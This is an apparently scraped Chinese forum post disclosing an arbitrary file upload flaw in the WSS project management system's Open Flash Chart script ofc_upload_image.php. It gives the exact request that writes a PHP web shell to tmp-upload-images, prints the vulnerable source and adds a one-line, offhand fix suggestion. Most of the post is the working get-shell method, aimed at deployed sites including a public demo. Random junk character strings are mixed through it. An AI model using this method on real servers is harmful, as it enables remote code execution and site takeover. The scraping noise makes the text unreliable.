WSS项目管理系统Post get shell

admin

POST 数据漏洞文件执行任意后缀文件保存
漏洞文件/chart/php-ofc-library/ofc_upload_image.php

6 n1 }6 k" s6 o利用：
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
0 F/ Y1 u* z+ L( E8 J1 q
Post任意数据
& ~' o6 J, b# j  ^- K保存位置http://localhost/chart/tmp-upload-images/hfy.php
5 h) S- I8 _9 b9 U* H9 w
7 t/ g$ Q3 ^* B) E; @
0 D& k( P" t! x% I# k; z; R% G最新版wss漏洞文件，即使是收费版本也有的，在新浪商店部署的demo~

<?php
' a/ O$ k8 ?5 x. @, Z9 H
8 G" U3 k. O2 R, e. F/ f% B//
: a: [- e- e& k# c6 S/ `) t8 E: I6 f! Y// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
2 i) X9 M2 y% O' ^) E  B, O//

( d/ x; N+ T1 O9 r" D/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

, p& ?9 ^) l2 R' h. B% zprint_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
" r/ N$ J! q5 z; e- m
*/
1 Z/ ?- e  Z! b// default path for the image to be stored //
$default_path = '../tmp-upload-images/';
6 F; g5 ]1 S0 w$ a
% G8 |3 I- S" C; L0 R0 s% ?8 Rif (!file_exists($default_path)) mkdir($default_path, 0777, true);

- ?# \& `$ B: z1 W6 T// full path to the saved image including filename //
3 H7 J% y# R) S$destination = $default_path . basename( $_GET[ 'name' ] );

: E' L6 W. Z2 [1 _echo 'Saving your image to: '. $destination;
// print_r( $_POST );
8 ^3 i# g2 s  G& l  y// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;
4 r- c% z# m, ]( `7 G
//
7 P* y& Y0 X) s8 f// POST data is usually string data, but we are passing a RAW .png
/ k$ s  H6 d: S) h) F! W, G7 h! M// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
& y2 `+ e* r; t/ V6 y//

5 Z: l4 n" K& D7 \$ K7 q$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);
9 t8 a0 n- G2 E$ A
//
// LOOK:
& P) b  C. O7 E& R* P* U# q9 ^//
exit();
//
// PHP5:
7 M! M: ^" q* v, b2 P  ]. v/ b//
  E: [9 y8 x4 N. ]1 b8 q2 w
- X' p2 f, c+ i8 G
// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
  g3 U  p, a9 P, e$ A$ n
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
& z) q4 \6 z- h) r$ z$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );
$ m7 b8 C3 P/ C" m) c6 c
// move the image into the specified directory //
% ]  A! B+ j1 O% tif (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
* `8 _8 n) v' r( b    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
. q8 {# I5 b  V( A3 F! `} else {
1 Y1 U* ]2 G5 [& c    echo "FILE UPLOAD FAILED";
' n# h" b0 e2 y: D6 j% k6 x  P3 ]}

6 u9 h: p8 Q# O. h2 B" d# |
6 g& m+ A) i, ]% E: `0 G% S?>

- y  v0 o) s$ _& o3 y/ W# J



1 m6 T: @# i) F, l# x5 ]
修复方案：
这个漏洞文件就是个杯具，怎么破，加权限验证，后缀等验证~，自己搞

2 ]) W  o2 n. A0 L8 q  U- Q" S: u

/ C6 _. B1 g3 ^% f9 T" A/ W
, j6 ^' l# I' u